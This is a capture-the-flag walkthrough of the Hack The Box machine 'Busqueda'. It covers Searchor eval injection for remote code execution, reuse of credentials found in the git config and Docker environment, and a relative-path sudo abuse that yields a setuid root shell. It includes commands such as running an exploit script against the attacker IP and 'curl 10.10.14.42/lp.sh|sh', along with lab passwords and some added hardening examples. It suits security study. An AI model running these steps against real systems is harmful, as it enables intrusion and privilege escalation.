Busqueda

Recon

nmap_scan.log

HTTP (80)

The application offers a search form (what exactly it searches is not obvious yet).

Writeup.png

The main endpoint is /search. A query containing a double quote (") still returns output, but a query containing a single quote (') returns nothing.

Writeup-1.png
<p class="copyright">
  Powered by
  <a
    style="color: black"
    target="_blank"
    href="https://flask.palletsprojects.com"
    >Flask</a
  >
  and
  <a
    style="color: black"
    target="_blank"
    href="https://github.com/ArjunSharda/Searchor"
    >Searchor 2.4.0</a
  >
</p>
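To see why a single quote returns nothing while a double quote is harmless, here is an added example (not Searchor's code and not from the writeup author) reconstructing the pattern behind Searchor 2.4.0's search: the engine name and query are interpolated into a Python expression that is handed to eval(), so a stray quote breaks the expression's syntax and any input that keeps it valid runs as code. The hardened version beside it selects the engine by name and never evaluates text; the Engine table and URLs are constructed for the demo.

```python
from enum import Enum
from urllib.parse import quote_plus


class Engine(Enum):
    """Constructed stand-in for a search-engine table: value is the query URL prefix."""
    Google = "https://www.google.com/search?q="
    Bing = "https://www.bing.com/search?q="

    def search(self, query: str) -> str:
        return self.value + quote_plus(query)


def search_eval(engine: str, query: str) -> str:
    """Unsafe pattern: user input becomes part of the source text handed to eval().

    A single quote in `query` closes the string literal early, so the expression no
    longer parses (SyntaxError, seen on the box as an empty response); a double quote
    sits harmlessly inside the single-quoted literal. Input that keeps the expression
    valid is executed as code, which is the root cause of the RCE.
    """
    return eval(f"Engine.{engine}.search('{query}')")


def search_safe(engine: str, query: str) -> str:
    """Hardened version: select the engine by name and pass the query as a value.

    Nothing is parsed as code, so quotes are just characters that get URL-encoded.
    """
    try:
        selected = Engine[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None
    return selected.search(query)


def quote_probe(engine: str = "Google") -> dict:
    """Replay the recon observation: how each variant reacts to either quote character."""
    results = {}
    for label, query in (("double", 'say "hi"'), ("single", "it's")):
        try:
            search_eval(engine, query)
            results[("eval", label)] = "ok"
        except SyntaxError:
            results[("eval", label)] = "SyntaxError"
        results[("safe", label)] = "ok" if search_safe(engine, query) else "empty"
    return results
```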

RCE

Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection

└─$ git clone https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection.git
└─$ bash Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection/exploit.sh http://searcher.htb/ 10.10.14.42 4444
...
Writeup-2.png

Reverse Shell

svc@busqueda:/var/www/app$ id
uid=1000(svc) gid=1000(svc) groups=1000(svc)

User.txt

svc@busqueda:~$ cat user.txt
699a3f07b499c6bd4fbe33ddeb5cc34c

Privilege Escalation

Upgrade shell to SSH:

└─$ ssh-keygen -f id_rsa -P x -q
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINC9MDaxPorytmkFkFBCWa95kksRBqlAwfXNOycqlPRe woyag@kraken
---
svc@busqueda:~$ mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINC9MDaxPorytmkFkFBCWa95kksRBqlAwfXNOycqlPRe woyag@kraken' > ~/.ssh/authorized_keys
---
└─$ ssh svc@searcher.htb -i id_rsa

Gitea is running locally on port 3000

svc@busqueda:~$ ss -utnlp4
Netid          State           Recv-Q          Send-Q                    Local Address:Port                      Peer Address:Port          Process
udp            UNCONN          0               0                         127.0.0.53%lo:53                             0.0.0.0:*
udp            UNCONN          0               0                               0.0.0.0:68                             0.0.0.0:*
tcp            LISTEN          0               4096                      127.0.0.53%lo:53                             0.0.0.0:*
tcp            LISTEN          0               128                             0.0.0.0:22                             0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:3000                           0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:222                            0.0.0.0:*
tcp            LISTEN          0               128                           127.0.0.1:5000                           0.0.0.0:*              users:(("python3",pid=1547,fd=6),("python3",pid=1547,fd=4))
tcp            LISTEN          0               4096                          127.0.0.1:3306                           0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:40683                          0.0.0.0:*

Enumerate with linpeas

svc@busqueda:~$ curl 10.10.14.42/lp.sh|sh|tee lp.log
...
══╣ PHP exec extensions
...
lrwxrwxrwx 1 root root 35 Dec  1  2022 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ProxyPreserveHost On
        ServerName searcher.htb
        ServerAdmin admin@searcher.htb
        ProxyPass / http://127.0.0.1:5000/
        ProxyPassReverse / http://127.0.0.1:5000/
        RewriteEngine On
        RewriteCond %{HTTP_HOST} !^searcher.htb$
        RewriteRule /.* http://searcher.htb/ [R]
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
        ProxyPreserveHost On
        ServerName gitea.searcher.htb
        ServerAdmin admin@searcher.htb
        ProxyPass / http://127.0.0.1:3000/
        ProxyPassReverse / http://127.0.0.1:3000/
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
...
╔══════════╣ Analyzing Github Files (limit 70)
...
-rw-rw-r-- 1 svc svc 109 Nov 24 19:03 /home/svc/.gitconfig
[user]
        email = cody@searcher.htb
        name = cody
[core]
        hooksPath = no-hooks
[safe]
        directory = /var/www/app

drwxr-x--- 8 root root 4096 Apr  3  2023 /opt/scripts/.git
drwxr-xr-x 8 www-data www-data 4096 Nov 24 18:52 /var/www/app/.git

Check /opt/scripts: the scripts are executable but not readable by us.

svc@busqueda:/opt/scripts$ ls -alh
total 28K
drwxr-xr-x 3 root root 4.0K Dec 24  2022 .
drwxr-xr-x 4 root root 4.0K Mar  1  2023 ..
-rwx--x--x 1 root root  586 Dec 24  2022 check-ports.py
-rwx--x--x 1 root root  857 Dec 24  2022 full-checkup.sh
drwxr-x--- 8 root root 4.0K Apr  3  2023 .git
-rwx--x--x 1 root root 3.3K Dec 24  2022 install-flask.sh
-rwx--x--x 1 root root 1.9K Dec 24  2022 system-checkup.py

Going back to the web app's repository, the git config stores the remote URL with embedded credentials, which gives us cody's password.

svc@busqueda:/var/www/app$ git config --list
user.email=cody@searcher.htb
user.name=cody
core.hookspath=no-hooks
safe.directory=/var/www/app
core.repositoryformatversion=0
core.filemode=true
core.bare=false
core.logallrefupdates=true
remote.origin.url=http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
remote.origin.fetch=+refs/heads/*:refs/remotes/origin/*
branch.main.remote=origin
branch.main.merge=refs/heads/main
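The exposure above (a password kept in a remote URL, readable by anyone who can read the repository's .git/config) is easy to scan for. The following added example, not from the page or any project, parses the `git config --list` key=value format shown above and reports remote URLs that carry a password, with the secret redacted; the sample config is constructed and its password is a placeholder.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed sample in `git config --list` format (the password is a placeholder).
SAMPLE_CONFIG = """\
user.email=cody@searcher.htb
user.name=cody
remote.origin.url=http://cody:PLACEHOLDER_PASSWORD@gitea.searcher.htb/cody/Searcher_site.git
remote.upstream.url=https://gitea.searcher.htb/cody/Searcher_site.git
remote.mirror.url=git@gitea.searcher.htb:cody/Searcher_site.git
"""


def find_url_credentials(config_text: str) -> list[dict]:
    """Return one finding per remote URL whose userinfo part contains a password."""
    findings = []
    for line in config_text.splitlines():
        key, sep, value = line.partition("=")
        if not sep or not (key.startswith("remote.") and key.endswith(".url")):
            continue
        parts = urlsplit(value)
        if parts.scheme not in ("http", "https") or parts.password is None:
            continue  # scp-style git@host:path remotes carry no URL userinfo
        host = parts.hostname + (f":{parts.port}" if parts.port else "")
        redacted = urlunsplit(parts._replace(netloc=f"{parts.username}:***@{host}"))
        findings.append({
            "remote": key[len("remote."):-len(".url")],
            "user": parts.username,
            "redacted_url": redacted,
        })
    return findings
```

Run it over `git config --list` output from each checkout you audit; the fix for a positive finding is to move the credential into a credential helper and rewrite the remote URL without it.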

Port forward Gitea

└─$ ssh svc@searcher.htb -i id_rsa -L 3000:0:3000
Writeup-3.png

Nothing useful there, but the same password is also the svc Linux user's password, so we can check sudo:

svc@busqueda:/var/www/app$ sudo -l
Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py .
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup
     
svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED         STATUS          PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   22 months ago   Up 35 minutes   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   22 months ago   Up 35 minutes   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

https://docs.docker.com/reference/cli/docker/inspect/

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' gitea/gitea:latest
{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"sha256:934d81f1d0494b0ddfd08a1421735360ad394d4b9f4f419a87d3e2c51dfec10e","Volumes":{"/data":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}}

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' 960
{"Hostname":"960873171e2e","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["USER_UID=115","USER_GID=121","GITEA__database__DB_TYPE=mysql","GITEA__database__HOST=db:3306","GITEA__database__NAME=gitea","GITEA__database__USER=gitea","GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"gitea/gitea:latest","Volumes":{"/data":{},"/etc/localtime":{},"/etc/timezone":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"com.docker.compose.config-hash":"e9e6ff8e594f3a8c77b688e35f3fe9163fe99c66597b19bdd03f9256d630f515","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"docker","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/root/scripts/docker","com.docker.compose.service":"server","com.docker.compose.version":"1.29.2","maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}}

Inspecting by container ID shows more than inspecting the image: the image config only carries what was baked in at build time, while the container config includes the runtime environment that docker-compose injected, and that is where the database credentials are:

1. "GITEA__database__USER=gitea",
2. "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",

We can now log in to Gitea as administrator, reusing the database password:

Creds: administrator:yuiu1hoiu4i5ho1uh

Writeup-4.png

http://localhost:3000/administrator/scripts/src/branch/main/system-checkup.py

The full-checkup option appears to run full-checkup.sh via a relative path, so it is looked up in the current working directory rather than in /opt/scripts. Since the sudo rule lets us run the script from any directory, we can take advantage of that.

Writeup-5.png
svc@busqueda:/tmp$ cd /tmp
echo -e '#!/bin/bash\ninstall -m 4777 /bin/bash /tmp/rootbash' > full-checkup.sh
chmod +x full-checkup.sh
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
/tmp/rootbash -p

[+] Done!
rootbash-5.1# id
uid=1000(svc) gid=1000(svc) euid=0(root) groups=1000(svc)
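The added example below (not the box's system-checkup.py, whose source this page does not reproduce) shows the flaw in minimal form: a privileged script that starts its helper by a relative path, which resolves against the caller's working directory that sudo preserves. Beside it is a version that anchors the helper to the script's own directory and checks ownership and permissions before running it. The helper name is taken from the sudo rule; the directories are constructed in a temp dir.

```python
import subprocess
import tempfile
from pathlib import Path

HELPER = "full-checkup.sh"


def run_helper_relative(cwd: str) -> str:
    """Flawed pattern: './full-checkup.sh' is resolved against the caller's working
    directory, which sudo keeps. Whoever chooses the cwd chooses what runs as root."""
    proc = subprocess.run(["sh", "./" + HELPER], cwd=cwd, capture_output=True,
                          text=True, check=True)
    return proc.stdout.strip()


def run_helper_anchored(script_dir: Path, cwd: str) -> str:
    """Fix: resolve the helper next to the privileged script itself and refuse it
    unless it is a regular file, owned by the script directory's owner and not
    writable by group or others. The caller's cwd no longer matters."""
    helper = (script_dir / HELPER).resolve()
    st = helper.stat()
    if (not helper.is_file() or st.st_uid != script_dir.stat().st_uid
            or st.st_mode & 0o022):
        raise PermissionError(f"refusing untrusted helper {helper}")
    proc = subprocess.run(["sh", str(helper)], cwd=cwd, capture_output=True,
                          text=True, check=True)
    return proc.stdout.strip()


def build_demo() -> tuple[Path, Path]:
    """Constructed fixture: a 'trusted' dir playing /opt/scripts and a 'rogue' dir
    playing /tmp, each holding a full-checkup.sh that reports where it came from."""
    base = Path(tempfile.mkdtemp())
    dirs = {}
    for name in ("trusted", "rogue"):
        d = base / name
        d.mkdir()
        script = d / HELPER
        script.write_text(f"#!/bin/sh\necho {name}\n")
        script.chmod(0o755)
        dirs[name] = d
    return dirs["trusted"], dirs["rogue"]
```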

Root.txt

rootbash-5.1# cat root.txt
5c07065f231ea771d167f02aa0dfac31
